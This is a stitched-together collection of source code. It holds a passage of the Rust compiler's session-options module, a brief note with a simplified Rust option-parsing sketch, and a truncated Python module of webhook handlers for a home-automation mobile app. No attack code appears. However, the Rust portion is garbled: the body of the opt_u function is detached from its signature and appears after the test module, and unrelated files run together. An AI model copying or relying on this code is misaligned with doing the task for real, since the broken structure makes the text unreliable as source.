bool = (false, parse_bool, "Print the arguments passed to the linker"), gc: bool = (false, parse_bool, "Garbage collect shared data (experimental)"), print_llvm_passes: bool = (false, parse_bool, "Prints the llvm optimization passes being run"), ast_json: bool = (false, parse_bool, "Print the AST as JSON and halt"), ast_json_noexpand: bool = (false, parse_bool, "Print the pre-expansion AST as JSON and halt"), ls: bool = (false, parse_bool, "List the symbols defined by a library crate"), save_analysis: bool = (false, parse_bool, "Write syntax and type analysis information in addition to normal output"), print_move_fragments: bool = (false, parse_bool, "Print out move-fragment data for every fn"), flowgraph_print_loans: bool = (false, parse_bool, "Include loan analysis data in --pretty flowgraph output"), flowgraph_print_moves: bool = (false, parse_bool, "Include move analysis data in --pretty flowgraph output"), flowgraph_print_assigns: bool = (false, parse_bool, "Include assignment analysis data in --pretty flowgraph output"), flowgraph_print_all: bool = (false, parse_bool, "Include all dataflow analysis data in --pretty flowgraph output"), print_region_graph: bool = (false, parse_bool, "Prints region inference graph. 
\ Use with RUST_REGION_GRAPH=help for more info"), parse_only: bool = (false, parse_bool, "Parse only; do not compile, assemble, or link"), no_trans: bool = (false, parse_bool, "Run all passes except translation; no output"), treat_err_as_bug: bool = (false, parse_bool, "Treat all errors that occur as bugs"), no_analysis: bool = (false, parse_bool, "Parse and expand the source, but run no analysis"), extra_plugins: Vec<String> = (Vec::new(), parse_list, "load extra plugins"), unstable_options: bool = (false, parse_bool, "Adds unstable command line options to rustc interface"), print_enum_sizes: bool = (false, parse_bool, "Print the size of enums and their variants"), force_overflow_checks: Option<bool> = (None, parse_opt_bool, "Force overflow checks on or off"), force_dropflag_checks: Option<bool> = (None, parse_opt_bool, "Force drop flag checks on or off"), trace_macros: bool = (false, parse_bool, "For every macro invocation, print its name and arguments"), disable_nonzeroing_move_hints: bool = (false, parse_bool, "Force nonzeroing move optimization off"), } pub fn default_lib_output() -> CrateType { CrateTypeRlib } pub fn default_configuration(sess: &Session) -> ast::CrateConfig { use syntax::parse::token::intern_and_get_ident as intern; let end = &sess.target.target.target_endian; let arch = &sess.target.target.arch; let wordsz = &sess.target.target.target_pointer_width; let os = &sess.target.target.target_os; let env = &sess.target.target.target_env; let fam = match sess.target.target.options.is_like_windows { true => InternedString::new("windows"), false => InternedString::new("unix") }; let mk = attr::mk_name_value_item_str; let mut ret = vec![ // Target bindings. attr::mk_word_item(fam.clone()), mk(InternedString::new("target_os"), intern(os)), mk(InternedString::new("target_family"), fam), mk(InternedString::new("target_arch"), intern(arch)), mk(InternedString::new("target_endian"), intern(end)), mk(InternedString::new("target_pointer_width"), intern(wordsz)), mk(InternedString::new("target_env"), intern(env)), ]; if sess.opts.debug_assertions { ret.push(attr::mk_word_item(InternedString::new("debug_assertions"))); } return ret; } pub fn append_configuration(cfg: &mut ast::CrateConfig, name: InternedString) { if !cfg.iter().any(|mi| mi.name() == name) { cfg.push(attr::mk_word_item(name)) } } pub fn build_configuration(sess: &Session) -> ast::CrateConfig { // Combine the configuration requested by the session (command line) with // some default and generated configuration items let default_cfg = default_configuration(sess); let mut user_cfg = sess.opts.cfg.clone(); // If the user wants a test runner, then add the test cfg if sess.opts.test { append_configuration(&mut user_cfg, InternedString::new("test")) } let mut v = user_cfg.into_iter().collect::<Vec<_>>(); v.push_all(&default_cfg[..]); v } pub fn build_target_config(opts: &Options, sp: &SpanHandler) -> Config { let target = match Target::search(&opts.target_triple) { Ok(t) => t, Err(e) => { sp.handler().fatal(&format!("Error loading target specification: {}", e)); } }; let (int_type, uint_type) = match &target.target_pointer_width[..] { "32" => (ast::TyI32, ast::TyU32), "64" => (ast::TyI64, ast::TyU64), w => sp.handler().fatal(&format!("target specification was invalid: unrecognized \ target-pointer-width {}", w)) }; Config { target: target, int_type: int_type, uint_type: uint_type, } } /// Returns the "short" subset of the stable rustc command line options. 
pub fn short_optgroups() -> Vec<getopts::OptGroup> { rustc_short_optgroups().into_iter() .filter(|g|g.is_stable()) .map(|g|g.opt_group) .collect() } /// Returns all of the stable rustc command line options. pub fn optgroups() -> Vec<getopts::OptGroup> { rustc_optgroups().into_iter() .filter(|g|g.is_stable()) .map(|g|g.opt_group) .collect() } #[derive(Copy, Clone, PartialEq, Eq, Debug)] pub enum OptionStability { Stable, Unstable } #[derive(Clone, PartialEq, Eq)] pub struct RustcOptGroup { pub opt_group: getopts::OptGroup, pub stability: OptionStability, } impl RustcOptGroup { pub fn is_stable(&self) -> bool { self.stability == OptionStability::Stable } fn stable(g: getopts::OptGroup) -> RustcOptGroup { RustcOptGroup { opt_group: g, stability: OptionStability::Stable } } fn unstable(g: getopts::OptGroup) -> RustcOptGroup { RustcOptGroup { opt_group: g, stability: OptionStability::Unstable } } } // The `opt` local module holds wrappers around the `getopts` API that // adds extra rustc-specific metadata to each option; such metadata // is exposed by . The public // functions below ending with `_u` are the functions that return // *unstable* options, i.e. options that are only enabled when the // user also passes the `-Z unstable-options` debugging flag. mod opt { // The `fn opt_u` etc below are written so that we can use them // in the future; do not warn about them not being used right now. #![allow(dead_code)] use getopts; use super::RustcOptGroup; pub type R = RustcOptGroup; pub type S<'a> = &'a str; fn stable(g: getopts::OptGroup) -> R { RustcOptGroup::stable(g) } fn unstable(g: getopts::OptGroup) -> R { RustcOptGroup::unstable(g) } // FIXME (pnkfelix): We default to stable since the current set of // options is defacto stable. However, it would be good to revise the // code so that a stable option is the thing that takes extra effort // to encode. pub fn opt(a: S, b: S, c: S, d: S) -> R { stable(getopts::optopt(a, b, c, d)) } pub fn multi(a: S, b: S, c: S, d: S) -> R { stable(getopts::optmulti(a, b, c, d)) } pub fn flag(a: S, b: S, c: S) -> R { stable(getopts::optflag(a, b, c)) } pub fn flagopt(a: S, b: S, c: S, d: S) -> R { stable(getopts::optflagopt(a, b, c, d)) } pub fn flagmulti(a: S, b: S, c: S) -> R { stable(getopts::optflagmulti(a, b, c)) } pub fn opt_u(a: S, b: S, c: S, d: S) -> R
pub fn multi_u(a: S, b: S, c: S, d: S) -> R { unstable(getopts::optmulti(a, b, c, d)) } pub fn flag_u(a: S, b: S, c: S) -> R { unstable(getopts::optflag(a, b, c)) } pub fn flagopt_u(a: S, b: S, c: S, d: S) -> R { unstable(getopts::optflagopt(a, b, c, d)) } pub fn flagmulti_u(a: S, b: S, c: S) -> R { unstable(getopts::optflagmulti(a, b, c)) } } /// Returns the "short" subset of the rustc command line options, /// including metadata for each option, such as whether the option is /// part of the stable long-term interface for rustc. pub fn rustc_short_optgroups() -> Vec<RustcOptGroup> { vec![ opt::flag("h", "help", "Display this message"), opt::multi("", "cfg", "Configure the compilation environment", "SPEC"), opt::multi("L", "", "Add a directory to the library search path", "[KIND=]PATH"), opt::multi("l", "", "Link the generated crate(s) to the specified native library NAME. The optional KIND can be one of, static, dylib, or framework. If omitted, dylib is assumed.", "[KIND=]NAME"), opt::multi("", "crate-type", "Comma separated list of types of crates for the compiler to emit", "[bin|lib|rlib|dylib|staticlib]"), opt::opt("", "crate-name", "Specify the name of the crate being built", "NAME"), opt::multi("", "emit", "Comma separated list of types of output for \ the compiler to emit", "[asm|llvm-bc|llvm-ir|obj|link|dep-info]"), opt::multi("", "print", "Comma separated list of compiler information to \ print on stdout", "[crate-name|file-names|sysroot]"), opt::flagmulti("g", "", "Equivalent to -C debuginfo=2"), opt::flagmulti("O", "", "Equivalent to -C opt-level=2"), opt::opt("o", "", "Write output to <filename>", "FILENAME"), opt::opt("", "out-dir", "Write output to compiler-chosen filename \ in <dir>", "DIR"), opt::opt("", "explain", "Provide a detailed explanation of an error \ message", "OPT"), opt::flag("", "test", "Build a test harness"), opt::opt("", "target", "Target triple cpu-manufacturer-kernel[-os] \ to compile for (see chapter 3.4 of \ http://www.sourceware.org/autobook/ for details)", "TRIPLE"), opt::multi("W", "warn", "Set lint warnings", "OPT"), opt::multi("A", "allow", "Set lint allowed", "OPT"), opt::multi("D", "deny", "Set lint denied", "OPT"), opt::multi("F", "forbid", "Set lint forbidden", "OPT"), opt::multi("", "cap-lints", "Set the most restrictive lint level. \ More restrictive lints are capped at this \ level", "LEVEL"), opt::multi("C", "codegen", "Set a codegen option", "OPT[=VALUE]"), opt::flag("V", "version", "Print version info and exit"), opt::flag("v", "verbose", "Use verbose output"), ] } /// Returns all rustc command line options, including metadata for /// each option, such as whether the option is part of the stable /// long-term interface for rustc. 
pub fn rustc_optgroups() -> Vec<RustcOptGroup> { let mut opts = rustc_short_optgroups(); opts.push_all(&[ opt::multi("", "extern", "Specify where an external rust library is \ located", "NAME=PATH"), opt::opt("", "sysroot", "Override the system root", "PATH"), opt::multi("Z", "", "Set internal debugging options", "FLAG"), opt::opt("", "color", "Configure coloring of output: auto = colorize, if output goes to a tty (default); always = always colorize output; never = never colorize output", "auto|always|never"), opt::flagopt_u("", "pretty", "Pretty-print the input instead of compiling; valid types are: `normal` (un-annotated source), `expanded` (crates expanded), `typed` (crates expanded, with type annotations), or `expanded,identified` (fully parenthesized, AST nodes with IDs).", "TYPE"), opt::flagopt_u("", "unpretty", "Present the input source, unstable (and less-pretty) variants; valid types are any of the types for `--pretty`, as well as: `flowgraph=<nodeid>` (graphviz formatted flowgraph for node), or `everybody_loops` (all function bodies replaced with `loop {}`).", "TYPE"), opt::opt_u("", "show-span", "Show spans for compiler debugging", "expr|pat|ty"), ]); opts } // Convert strings provided as --cfg [cfgspec] into a crate_cfg pub fn parse_cfgspecs(cfgspecs: Vec<String> ) -> ast::CrateConfig { cfgspecs.into_iter().map(|s| { parse::parse_meta_from_source_str("cfgspec".to_string(), s.to_string(), Vec::new(), &parse::ParseSess::new()) }).collect::<ast::CrateConfig>() } pub fn build_session_options(matches: &getopts::Matches) -> Options { let unparsed_crate_types = matches.opt_strs("crate-type"); let crate_types = parse_crate_types_from_list(unparsed_crate_types) .unwrap_or_else(|e| early_error(&e[..])); let mut lint_opts = vec!(); let mut describe_lints = false; for &level in &[lint::Allow, lint::Warn, lint::Deny, lint::Forbid] { for lint_name in matches.opt_strs(level.as_str()) { if lint_name == "help" { describe_lints = true; } else { lint_opts.push((lint_name.replace("-", "_"), level)); } } } let lint_cap = matches.opt_str("cap-lints").map(|cap| { lint::Level::from_str(&cap).unwrap_or_else(|| { early_error(&format!("unknown lint level: `{}`", cap)) }) }); let debugging_opts = build_debugging_options(matches); let parse_only = debugging_opts.parse_only; let no_trans = debugging_opts.no_trans; let treat_err_as_bug = debugging_opts.treat_err_as_bug; let no_analysis = debugging_opts.no_analysis; if debugging_opts.debug_llvm { unsafe { llvm::LLVMSetDebug(1); } } let mut output_types = Vec::new(); if !debugging_opts.parse_only && !no_trans { let unparsed_output_types = matches.opt_strs("emit"); for unparsed_output_type in &unparsed_output_types { for part in unparsed_output_type.split(',') { let output_type = match part { "asm" => OutputTypeAssembly, "llvm-ir" => OutputTypeLlvmAssembly, "llvm-bc" => OutputTypeBitcode, "obj" => OutputTypeObject, "link" => OutputTypeExe, "dep-info" => OutputTypeDepInfo, _ => { early_error(&format!("unknown emission type: `{}`", part)) } }; output_types.push(output_type) } } }; output_types.sort(); output_types.dedup(); if output_types.is_empty() { output_types.push(OutputTypeExe); } let cg = build_codegen_options(matches); let sysroot_opt = matches.opt_str("sysroot").map(|m| PathBuf::from(&m)); let target = matches.opt_str("target").unwrap_or( host_triple().to_string()); let opt_level = { if matches.opt_present("O") { if cg.opt_level.is_some() { early_error("-O and -C opt-level both provided"); } Default } else { match cg.opt_level { None => No, Some(0) => 
No, Some(1) => Less, Some(2) => Default, Some(3) => Aggressive, Some(arg) => { early_error(&format!("optimization level needs to be \ between 0-3 (instead was `{}`)", arg)); } } } }; let debug_assertions = cg.debug_assertions.unwrap_or(opt_level == No); let gc = debugging_opts.gc; let debuginfo = if matches.opt_present("g") { if cg.debuginfo.is_some() { early_error("-g and -C debuginfo both provided"); } FullDebugInfo } else { match cg.debuginfo { None | Some(0) => NoDebugInfo, Some(1) => LimitedDebugInfo, Some(2) => FullDebugInfo, Some(arg) => { early_error(&format!("debug info level needs to be between \ 0-2 (instead was `{}`)", arg)); } } }; let mut search_paths = SearchPaths::new(); for s in &matches.opt_strs("L") { search_paths.add_path(&s[..]); } let libs = matches.opt_strs("l").into_iter().map(|s| { let mut parts = s.splitn(2, '='); let kind = parts.next().unwrap(); let (name, kind) = match (parts.next(), kind) { (None, name) | (Some(name), "dylib") => (name, cstore::NativeUnknown), (Some(name), "framework") => (name, cstore::NativeFramework), (Some(name), "static") => (name, cstore::NativeStatic), (_, s) => { early_error(&format!("unknown library kind `{}`, expected \ one of dylib, framework, or static", s)); } }; (name.to_string(), kind) }).collect(); let cfg = parse_cfgspecs(matches.opt_strs("cfg")); let test = matches.opt_present("test"); let write_dependency_info = (output_types.contains(&OutputTypeDepInfo), None); let prints = matches.opt_strs("print").into_iter().map(|s| { match &*s { "crate-name" => PrintRequest::CrateName, "file-names" => PrintRequest::FileNames, "sysroot" => PrintRequest::Sysroot, req => { early_error(&format!("unknown print request `{}`", req)) } } }).collect::<Vec<_>>(); if !cg.remark.is_empty() && debuginfo == NoDebugInfo { early_warn("-C remark will not show source locations without \ --debuginfo"); } let color = match matches.opt_str("color").as_ref().map(|s| &s[..]) { Some("auto") => Auto, Some("always") => Always, Some("never") => Never, None => Auto, Some(arg) => { early_error(&format!("argument for --color must be auto, always \ or never (instead was `{}`)", arg)) } }; let mut externs = HashMap::new(); for arg in &matches.opt_strs("extern") { let mut parts = arg.splitn(2, '='); let name = match parts.next() { Some(s) => s, None => early_error("--extern value must not be empty"), }; let location = match parts.next() { Some(s) => s, None => early_error("--extern value must be of the format `foo=bar`"), }; externs.entry(name.to_string()).or_insert(vec![]).push(location.to_string()); } let crate_name = matches.opt_str("crate-name"); Options { crate_types: crate_types, gc: gc, optimize: opt_level, debuginfo: debuginfo, lint_opts: lint_opts, lint_cap: lint_cap, describe_lints: describe_lints, output_types: output_types, search_paths: search_paths, maybe_sysroot: sysroot_opt, target_triple: target, cfg: cfg, test: test, parse_only: parse_only, no_trans: no_trans, treat_err_as_bug: treat_err_as_bug, no_analysis: no_analysis, debugging_opts: debugging_opts, write_dependency_info: write_dependency_info, prints: prints, cg: cg, color: color, show_span: None, externs: externs, crate_name: crate_name, alt_std_name: None, libs: libs, unstable_features: get_unstable_features_setting(), debug_assertions: debug_assertions, } } pub fn get_unstable_features_setting() -> UnstableFeatures { // Whether this is a feature-staged build, i.e. 
on the beta or stable channel let disable_unstable_features = option_env!("CFG_DISABLE_UNSTABLE_FEATURES").is_some(); // The secret key needed to get through the rustc build itself by // subverting the unstable features lints let bootstrap_secret_key = option_env!("CFG_BOOTSTRAP_KEY"); // The matching key to the above, only known by the build system let bootstrap_provided_key = env::var("RUSTC_BOOTSTRAP_KEY").ok(); match (disable_unstable_features, bootstrap_secret_key, bootstrap_provided_key) { (_, Some(ref s), Some(ref p)) if s == p => UnstableFeatures::Cheat, (true, _, _) => UnstableFeatures::Disallow, (false, _, _) => UnstableFeatures::Allow } } pub fn parse_crate_types_from_list(list_list: Vec<String>) -> Result<Vec<CrateType>, String> { let mut crate_types: Vec<CrateType> = Vec::new(); for unparsed_crate_type in &list_list { for part in unparsed_crate_type.split(',') { let new_part = match part { "lib" => default_lib_output(), "rlib" => CrateTypeRlib, "staticlib" => CrateTypeStaticlib, "dylib" => CrateTypeDylib, "bin" => CrateTypeExecutable, _ => { return Err(format!("unknown crate type: `{}`", part)); } }; if !crate_types.contains(&new_part) { crate_types.push(new_part) } } } return Ok(crate_types); } impl fmt::Display for CrateType { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { CrateTypeExecutable => "bin".fmt(f), CrateTypeDylib => "dylib".fmt(f), CrateTypeRlib => "rlib".fmt(f), CrateTypeStaticlib => "staticlib".fmt(f) } } } #[cfg(test)] mod tests { use session::config::{build_configuration, optgroups, build_session_options}; use session::build_session; use getopts::getopts; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::diagnostics; // When the user supplies --test we should implicitly supply --cfg test #[test] fn test_switch_implies_cfg_test() { let matches = &match getopts(&["--test".to_string()], &optgroups()) { Ok(m) => m, Err(f) => panic!("test_switch_implies_cfg_test: {}", f) }; let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(matches); let sess = build_session(sessopts, None, registry); let cfg = build_configuration(&sess); assert!((attr::contains_name(&cfg[..], "test"))); } // When the user supplies --test and --cfg test, don't implicitly add // another --cfg test #[test] fn test_switch_implies_cfg_test_unless_cfg_test() { let matches = &match getopts(&["--test".to_string(), "--cfg=test".to_string()], &optgroups()) { Ok(m) => m, Err(f) => { panic!("test_switch_implies_cfg_test_unless_cfg_test: {}", f) } }; let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(matches); let sess = build_session(sessopts, None, registry); let cfg = build_configuration(&sess); let mut test_items = cfg.iter().filter(|m| m.name() == "test"); assert!(test_items.next().is_some()); assert!(test_items.next().is_none()); } #[test] fn test_can_print_warnings() { { let matches = getopts(&[ "-Awarnings".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(!sess.can_print_warnings); } { let matches = getopts(&[ "-Awarnings".to_string(), "-Dwarnings".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(sess.can_print_warnings); } { let matches = getopts(&[ 
"-Adead_code".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(sess.can_print_warnings); } } }
{ unstable(getopts::optopt(a, b, c, d)) }
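Note on the config.rs row above: the options! macro splits each -C/-Z argument on the first '=', normalises '-' to '_' in the key, and hands the optional value to a typed setter such as parse_opt_bool. A simplified stand-alone sketch of that key=value handling (illustration only, not the actual rustc code):

// Simplified model of one typed setter from the options! macro:
// accepts y/yes/on, n/no/off, or no value at all (meaning "true").
fn parse_opt_bool(slot: &mut Option<bool>, v: Option<&str>) -> bool {
    match v {
        Some("y") | Some("yes") | Some("on") => { *slot = Some(true); true }
        Some("n") | Some("no") | Some("off") => { *slot = Some(false); true }
        Some(_) => false,
        None => { *slot = Some(true); true }
    }
}

fn main() {
    // e.g. roughly what `-C no-redzone=yes` would feed into the option parser.
    let option = "no-redzone=yes";
    let mut iter = option.splitn(2, '=');
    let key = iter.next().unwrap().replace("-", "_");
    let value = iter.next();

    let mut no_redzone: Option<bool> = None;
    assert!(parse_opt_bool(&mut no_redzone, value));
    assert_eq!(key, "no_redzone");
    assert_eq!(no_redzone, Some(true));
}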
webhook.py
"""Webhook handlers for mobile_app.""" from functools import wraps import logging import secrets from aiohttp.web import HTTPBadRequest, Request, Response, json_response from nacl.secret import SecretBox import voluptuous as vol from openpeerpower.components.binary_sensor import ( DEVICE_CLASSES as BINARY_SENSOR_CLASSES, ) from openpeerpower.components.device_tracker import ( ATTR_BATTERY, ATTR_GPS, ATTR_GPS_ACCURACY, ATTR_LOCATION_NAME, ) from openpeerpower.components.frontend import MANIFEST_JSON from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN from openpeerpower.const import ( ATTR_DOMAIN, ATTR_SERVICE, ATTR_SERVICE_DATA, CONF_WEBHOOK_ID, HTTP_BAD_REQUEST, HTTP_CREATED, ) from openpeerpower.core import EventOrigin from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError from openpeerpower.helpers import config_validation as cv, device_registry as dr from openpeerpower.helpers.dispatcher import async_dispatcher_send from openpeerpower.helpers.template import attach from openpeerpower.helpers.typing import OpenPeerPowerType from openpeerpower.util.decorator import Registry from .const import ( ATTR_ALTITUDE, ATTR_APP_DATA, ATTR_APP_VERSION, ATTR_COURSE, ATTR_DEVICE_ID, ATTR_DEVICE_NAME, ATTR_EVENT_DATA, ATTR_EVENT_TYPE, ATTR_MANUFACTURER, ATTR_MODEL, ATTR_OS_VERSION, ATTR_SENSOR_ATTRIBUTES, ATTR_SENSOR_DEVICE_CLASS, ATTR_SENSOR_ICON, ATTR_SENSOR_NAME, ATTR_SENSOR_STATE, ATTR_SENSOR_TYPE, ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR, ATTR_SENSOR_UNIQUE_ID, ATTR_SENSOR_UOM, ATTR_SPEED, ATTR_SUPPORTS_ENCRYPTION, ATTR_TEMPLATE, ATTR_TEMPLATE_VARIABLES, ATTR_VERTICAL_ACCURACY, ATTR_WEBHOOK_DATA, ATTR_WEBHOOK_ENCRYPTED, ATTR_WEBHOOK_ENCRYPTED_DATA, ATTR_WEBHOOK_TYPE, CONF_CLOUDHOOK_URL, CONF_REMOTE_UI_URL, CONF_SECRET, DATA_CONFIG_ENTRIES, DATA_DELETED_IDS, DATA_STORE, DOMAIN, ERR_ENCRYPTION_ALREADY_ENABLED, ERR_ENCRYPTION_NOT_AVAILABLE, ERR_ENCRYPTION_REQUIRED, ERR_SENSOR_DUPLICATE_UNIQUE_ID, ERR_SENSOR_NOT_REGISTERED, SIGNAL_LOCATION_UPDATE, SIGNAL_SENSOR_UPDATE, ) from .helpers import ( _decrypt_payload, empty_okay_response, error_response, registration_context, safe_registration, savable_state, supports_encryption, webhook_response, ) _LOGGER = logging.getLogger(__name__) WEBHOOK_COMMANDS = Registry() COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES) SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR] WEBHOOK_PAYLOAD_SCHEMA = vol.Schema( { vol.Required(ATTR_WEBHOOK_TYPE): cv.string, vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list), vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean, vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string, } ) def validate_schema(schema): """Decorate a webhook function with a schema.""" if isinstance(schema, dict): schema = vol.Schema(schema) def wrapper(func): """Wrap function so we validate schema.""" @wraps(func) async def validate_and_run(opp, config_entry, data): """Validate input and call handler.""" try: data = schema(data) except vol.Invalid as ex: err = vol.humanize.humanize_error(data, ex) _LOGGER.error("Received invalid webhook payload: %s", err) return empty_okay_response() return await func(opp, config_entry, data) return validate_and_run return wrapper async def handle_webhook( opp: OpenPeerPowerType, webhook_id: str, request: Request ) -> Response: """Handle webhook callback.""" if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]: return 
Response(status=410) config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id] try: req_data = await request.json() except ValueError: _LOGGER.warning("Received invalid JSON from mobile_app") return empty_okay_response(status=HTTP_BAD_REQUEST) if ( ATTR_WEBHOOK_ENCRYPTED not in req_data and config_entry.data[ATTR_SUPPORTS_ENCRYPTION] ): _LOGGER.warning( "Refusing to accept unencrypted webhook from %s", config_entry.data[ATTR_DEVICE_NAME], ) return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required") try: req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data) except vol.Invalid as ex: err = vol.humanize.humanize_error(req_data, ex) _LOGGER.error("Received invalid webhook payload: %s", err) return empty_okay_response() webhook_type = req_data[ATTR_WEBHOOK_TYPE] webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {}) if req_data[ATTR_WEBHOOK_ENCRYPTED]: enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA] webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data) if webhook_type not in WEBHOOK_COMMANDS: _LOGGER.error("Received invalid webhook type: %s", webhook_type) return empty_okay_response() _LOGGER.debug( "Received webhook payload for type %s: %s", webhook_type, webhook_payload ) return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload) @WEBHOOK_COMMANDS.register("call_service") @validate_schema( { vol.Required(ATTR_DOMAIN): cv.string, vol.Required(ATTR_SERVICE): cv.string, vol.Optional(ATTR_SERVICE_DATA, default={}): dict, } ) async def webhook_call_service(opp, config_entry, data): """Handle a call service webhook.""" try: await opp.services.async_call( data[ATTR_DOMAIN], data[ATTR_SERVICE], data[ATTR_SERVICE_DATA], blocking=True, context=registration_context(config_entry.data), ) except (vol.Invalid, ServiceNotFound, Exception) as ex: _LOGGER.error( "Error when calling service during mobile_app " "webhook (device name: %s): %s", config_entry.data[ATTR_DEVICE_NAME], ex, ) raise HTTPBadRequest() return empty_okay_response() @WEBHOOK_COMMANDS.register("fire_event") @validate_schema( { vol.Required(ATTR_EVENT_TYPE): cv.string, vol.Optional(ATTR_EVENT_DATA, default={}): dict, } ) async def webhook_fire_event(opp, config_entry, data): """Handle a fire event webhook.""" event_type = data[ATTR_EVENT_TYPE] opp.bus.async_fire( event_type, data[ATTR_EVENT_DATA], EventOrigin.remote, context=registration_context(config_entry.data), ) return empty_okay_response() @WEBHOOK_COMMANDS.register("render_template") @validate_schema( { str: { vol.Required(ATTR_TEMPLATE): cv.template, vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict, } } ) async def webhook_render_template(opp, config_entry, data): """Handle a render template webhook.""" resp = {} for key, item in data.items(): try: tpl = item[ATTR_TEMPLATE] attach(opp, tpl) resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES)) except TemplateError as ex: resp[key] = {"error": str(ex)} return webhook_response(resp, registration=config_entry.data) @WEBHOOK_COMMANDS.register("update_location") @validate_schema( { vol.Optional(ATTR_LOCATION_NAME): cv.string, vol.Required(ATTR_GPS): cv.gps, vol.Required(ATTR_GPS_ACCURACY): cv.positive_int, vol.Optional(ATTR_BATTERY): cv.positive_int, vol.Optional(ATTR_SPEED): cv.positive_int, vol.Optional(ATTR_ALTITUDE): vol.Coerce(float), vol.Optional(ATTR_COURSE): cv.positive_int, vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int, }
) async def webhook_update_location(opp, config_entry, data): """Handle an update location webhook.""" opp.helpers.dispatcher.async_dispatcher_send( SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data ) return empty_okay_response() @WEBHOOK_COMMANDS.register("update_registration") @validate_schema( { vol.Optional(ATTR_APP_DATA, default={}): dict, vol.Required(ATTR_APP_VERSION): cv.string, vol.Required(ATTR_DEVICE_NAME): cv.string, vol.Required(ATTR_MANUFACTURER): cv.string, vol.Required(ATTR_MODEL): cv.string, vol.Optional(ATTR_OS_VERSION): cv.string, } ) async def webhook_update_registration(opp, config_entry, data): """Handle an update registration webhook.""" new_registration = {**config_entry.data, **data} device_registry = await dr.async_get_registry(opp) device_registry.async_get_or_create( config_entry_id=config_entry.entry_id, identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])}, manufacturer=new_registration[ATTR_MANUFACTURER], model=new_registration[ATTR_MODEL], name=new_registration[ATTR_DEVICE_NAME], sw_version=new_registration[ATTR_OS_VERSION], ) opp.config_entries.async_update_entry(config_entry, data=new_registration) return webhook_response( safe_registration(new_registration), registration=new_registration, ) @WEBHOOK_COMMANDS.register("enable_encryption") async def webhook_enable_encryption(opp, config_entry, data): """Handle a encryption enable webhook.""" if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]: _LOGGER.warning( "Refusing to enable encryption for %s because it is already enabled!", config_entry.data[ATTR_DEVICE_NAME], ) return error_response( ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled" ) if not supports_encryption(): _LOGGER.warning( "Unable to enable encryption for %s because libsodium is unavailable!", config_entry.data[ATTR_DEVICE_NAME], ) return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable") secret = secrets.token_hex(SecretBox.KEY_SIZE) data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret} opp.config_entries.async_update_entry(config_entry, data=data) return json_response({"secret": secret}) @WEBHOOK_COMMANDS.register("register_sensor") @validate_schema( { vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict, vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All( vol.Lower, vol.In(COMBINED_CLASSES) ), vol.Required(ATTR_SENSOR_NAME): cv.string, vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES), vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string, vol.Optional(ATTR_SENSOR_UOM): cv.string, vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float), vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon, } ) async def webhook_register_sensor(opp, config_entry, data): """Handle a register sensor webhook.""" entity_type = data[ATTR_SENSOR_TYPE] unique_id = data[ATTR_SENSOR_UNIQUE_ID] unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}" if unique_store_key in opp.data[DOMAIN][entity_type]: _LOGGER.error("Refusing to re-register existing sensor %s!", unique_id) return error_response( ERR_SENSOR_DUPLICATE_UNIQUE_ID, f"{entity_type} {unique_id} already exists!", status=409, ) data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID] opp.data[DOMAIN][entity_type][unique_store_key] = data try: await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp)) except OpenPeerPowerError as ex: _LOGGER.error("Error registering sensor: %s", ex) return empty_okay_response() register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE]) 
